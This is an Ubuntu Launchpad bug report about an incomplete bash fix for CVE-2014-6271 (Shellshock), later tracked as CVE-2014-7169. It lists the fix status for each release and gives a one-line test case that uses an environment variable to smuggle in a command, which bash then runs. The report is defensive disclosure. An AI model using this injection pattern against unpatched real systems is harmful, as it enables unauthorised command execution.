bash incomplete fix for CVE-2014-6271
Bug #1373781 reported by
Robin H. Johnson
This bug affects 21 people
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
bash (Ubuntu) |
Fix Released
|
Undecided
|
Marc Deslauriers | ||
Lucid |
Fix Released
|
Undecided
|
Unassigned | ||
Precise |
Fix Released
|
Undecided
|
Unassigned | ||
Trusty |
Fix Released
|
Undecided
|
Marc Deslauriers | ||
Utopic |
Fix Released
|
Undecided
|
Marc Deslauriers |
Bug Description
The fixes for CVE-2014-6271 do NOT work! Security vuln, but should be public, this is known already.
Ubuntu 14.04 LTS: bash 4.3-7ubuntu1.1
Ubuntu 12.04 LTS: bash 4.2-2ubuntu2.2
Ubuntu 10.04 LTS: bash 4.1-2ubuntu3.1
Testcase:
rm -f echo && env -i X='() { (a)=>\' bash -c 'echo id'; cat echo
expected output:
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
id
actual output:
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
uid=0(root) gid=0(root) groups=0(root)
To post a comment you must log in.
http:// seclists. org/oss- sec/2014/ q3/685
CVE-2014-7169 is assigned for the failed patch